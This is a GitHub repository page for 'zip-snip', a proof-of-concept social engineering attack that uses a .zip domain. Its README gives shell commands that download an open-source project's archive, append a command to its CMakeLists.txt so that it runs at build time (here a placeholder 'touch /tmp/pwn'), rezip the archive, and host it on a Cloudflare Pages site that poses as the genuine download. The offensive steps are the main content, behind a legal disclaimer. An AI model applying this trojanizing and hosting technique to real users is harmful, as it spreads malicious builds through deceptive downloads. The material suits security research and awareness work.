Skip to content

noperator/zip-snip

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
stack-overflow-example
stack-overflow-example
 
 
LICENSE.md
LICENSE.md
 
 
README.md
README.md
 
 
_headers
_headers
 
 
_redirects
_redirects
 
 
build-site.sh
build-site.sh
 
 

Repository files navigation

zip snip 🤐✂️

Social engineering attack using a .zip domain.

video

Description

See full blog post at https://noperator.dev/posts/zip-snip/.

Getting started

Usage

First, prepare a malicious ZIP file. For example, the following code:

  • downloads the zipped source code for a popular CLI URL parser
  • extracts the project and inserts a malicious command into a build script
  • zips the project back up
$ wget https://github.com/stricaud/faup/archive/refs/tags/v1.4.zip
$ unzip v1.4.zip
$ echo 'execute_process (COMMAND bash -c "touch /tmp/pwn")' >> faup-1.4/CMakeLists.txt
$ zip -r9 faup-1.4.zip faup-1.4

Next, create a Cloudflare Pages deployment (site.zip) that includes this malicious ZIP file.

$ ./build-site.sh faup-1.4.zip

After building a site above, nativate to Cloudflare Pages, choose (or create) your project, create a new deployment, and upload the site.zip file you just created.

Back matter

Legal disclaimer

Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

This project is licensed under the MIT License.

About

Social engineering attack using a .zip domain.

noperator.dev/posts/zip-snip/

Resources

Readme

License

MIT license
Activity

Stars

6 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages